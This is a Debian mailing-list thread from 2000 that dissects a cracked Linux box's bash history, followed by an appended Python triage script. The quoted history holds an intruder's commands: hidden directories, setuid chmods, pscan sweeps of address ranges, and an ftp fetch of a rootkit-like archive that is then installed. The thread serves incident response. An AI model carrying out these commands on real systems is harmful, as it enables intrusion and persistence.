
Re: bash_history from Cracked Computer



This Linux box was plugged into the same LAN as our company NT Network.
It wasn't set up to access the NT Network or be involved in it.  It just
gets its TCP/IP signal from the LAN.

My question is could this cracker get access to our NT Network from this
linux box?  Could he have scanned the ports of the computers physically
connected on this LAN?  Should I be concerned with the security of the
whole office now?

----- Original Message -----
From: w trillich <will@pinncomp.net>
To: <debian-user@lists.debian.org>
Sent: Tuesday, May 02, 2000 6:58 PM
Subject: Re: bash_history from Cracked Computer


> if you run updatedb via cron (or run it from the shell by hand
> recently) it'll tell you if you have any of the evil files
> on your computer:
> locate pscan
> locate wuftp
> locate bnc2
> locate .shit
> locate anatomy
> locate kod
> locate '/b$'
> if you find any source files (*.c or *.pl) consider finding a
> debian guru to hand them to in case this kind of thing can be
> snuffed in the future. might help, you never know.
>
>
> here's my run thru the command history...
>
> >cd /
> >cd home
> >cd .dead
> >mkdir .dead
> >cd .dead
>
> somehow, your invader transferred some files here into
> the /home/.dead/ at this point. must've used his own
> ftp client, meaning he used your server--on my debian
> box the FTP transfers are logged in
>
> /var/log/xferlog
>
> see if you've still got yours. it might help.
>
> >cc anatomy.c -o anatomy
> >cc kod.c -o kofd
>
> i'd guess that 'anatomy' scans your directory tree
> and reports it back to the IP supplied as its
> command-line argument. or it may copy everything.
> maybe it scans the structure of the remote site.
> don't know. (you may still have the source code;
> if so, it might be helpful to hand it off to
> some of the C++ gurus around here so they can
> wedge it out of existence...)
>
> >cp kofd kod
> >rm kofd
>
> hmm! he never directly called kod, but some of the other
> programs may have.
>
> >cd home
> >cd httpd
> >cd icons
> >cd small
> >cd .shit
>
> looks like cut & paste, and maybe the last two didn't take.
>
> >mkdir small
> >cd small
> >mkdir .shit
> >cd .shit
>
> so i guess he's now at /home/httpd/icons/small/.shit
>
> >who
>
> unless there's a logout and login to another directory,
> more files were transferred here somehow.
>
> >chmod 777 *
> >chmod +s *
> >chmod 666 *
> >chmod 777 *
> >./pscan
> >./b
> >./pscan 167.64 111
>
> and it looks like PSCAN does a whole zone at a time.
> to what end, i don't know.
>
> down a bit, there's
>
> >./pscan 198.138 111
> >cat wuftp.log
> >rm wuftp.log
> >./pscan 198.59 111
> >cat wuftp.log
>
> so the PSCAN program creates "wuftp.log" i guess.
>
> of course, he zapped it before checking out.
> i'd bet it was in /home/httpd/icons/small/.shit/
> along with some other files... may still be there.
>
> seemed to run the PSCAN on an ip net range, then check
> the wuftp log file, apparently to get other IP ranges
> to scan. ?
>
> (you might try seeing if there's any left on the system.
> may be informative.)
>
>
> now THIS part i would consider very bad news:
>
> >ftp columbia.digiweb.com
> [obviously transferring linux kernel here]
> >tar -zxvf linux.tar.gz
> >cd .bd
> >./install
>
> (i know, it's all bad news, but some is badder than others.)
>
> there's also a
> >telnet 198.150.93.205
>
> which reports as nonexistent just now, so it's probably a
> transient or dynamically-allocated ppp-like address.
>
> ===
>
> to find where the IPs are that he/she was interested in,
> (in case it helps any, or you want to contact their
> sysadmins) i did this in tcsh:
>
> % grep anatomy bash_history.txt | cut -f2 "-d "
> 216.209.196.154
> 216.209.205.68
> 216.209.207.150
> 212.1.128.61
> 212.1.128.61
>
> % foreach x(`!!`)
> foreach x ( `grep anatomy bash_history.txt | cut -f2 "-d "` )
> foreach? nslookup $x
> foreach? end
>
> Name:    HSE-Montreal-ppp33164.qc.sympatico.ca
> Address:  216.209.196.154
>
> Name:    HSE-Montreal-ppp35364.qc.sympatico.ca
> Address:  216.209.205.68
>
> Name:    HSE-Quebec-City-ppp35954.qc.sympatico.ca
> Address:  216.209.207.150
>
> Name:    cache-1.www.telinco.net
> Address:  212.1.128.61
>
> Name:    cache-1.www.telinco.net
> Address:  212.1.128.61
>
>
>
> maybe he/she had some friends in canada...?
>
>
>
> and for the "./b" program:
> foreach x ( `grep /b bash_history.txt | cut -f2 "-d " | sort | uniq` )
> foreach? nslookup $x >> bash_crack
> foreach? end
>
> ===
>
> sorry this happened! hopefully your troubles can help us all
> avoid it in the future... do you have any idea how they originally
> got in?
>
>
>
>
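As an added example (not code from either message in the thread), a small Python triage script that automates the read-through done above: it takes a constructed history excerpt modelled on the quoted commands and pulls out the hidden directories created, the binaries compiled, the setuid chmods, the network arguments handed to each locally run tool, and the remote hosts contacted.

```python
import re
from collections import defaultdict

# Constructed history excerpt modelled on the commands quoted in the thread;
# it is not the original bash_history file.
SAMPLE_HISTORY = """\
cd /home
mkdir .dead
cd .dead
cc anatomy.c -o anatomy
cc kod.c -o kofd
mkdir small
cd small
mkdir .shit
cd .shit
chmod 777 *
chmod +s *
./pscan 167.64 111
./b 139.78.100.200
./pscan 198.138 111
./anatomy 216.209.196.154
telnet 198.150.93.205
ftp columbia.digiweb.com
"""

# Dotted decimal, either a full address or a truncated prefix such as "167.64".
IPISH = re.compile(r"^\d{1,3}(?:\.\d{1,3}){1,3}$")

def triage_history(text):
    """Summarise a shell history for an incident read-through: hidden
    directories created, binaries compiled, setuid chmods, the network
    arguments handed to each locally run tool, and remote hosts contacted."""
    report = {"hidden_dirs": [], "compiled": [], "setuid_chmods": 0,
              "tool_targets": defaultdict(list), "remote_hosts": []}
    for line in text.splitlines():
        argv = line.split()
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if cmd == "mkdir":
            report["hidden_dirs"] += [a for a in args if a.startswith(".")]
        elif cmd in ("cc", "gcc") and "-o" in args[:-1]:
            report["compiled"].append(args[args.index("-o") + 1])
        elif cmd == "chmod" and args and args[0] in ("+s", "u+s", "g+s", "ug+s"):
            report["setuid_chmods"] += 1
        elif cmd.startswith("./"):  # a locally dropped tool being run
            report["tool_targets"][cmd[2:]] += [a for a in args if IPISH.match(a)]
        elif cmd in ("telnet", "ftp", "ssh", "rsh", "rlogin") and args:
            report["remote_hosts"].append(args[0])
    report["tool_targets"] = dict(report["tool_targets"])
    return report

if __name__ == "__main__":
    for key, value in triage_history(SAMPLE_HISTORY).items():
        print(f"{key}: {value}")
```

Feed it the real history file instead of SAMPLE_HISTORY and the tool_targets entry gives the per-tool list of networks and hosts to notify, as the nslookup loop above does by hand.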

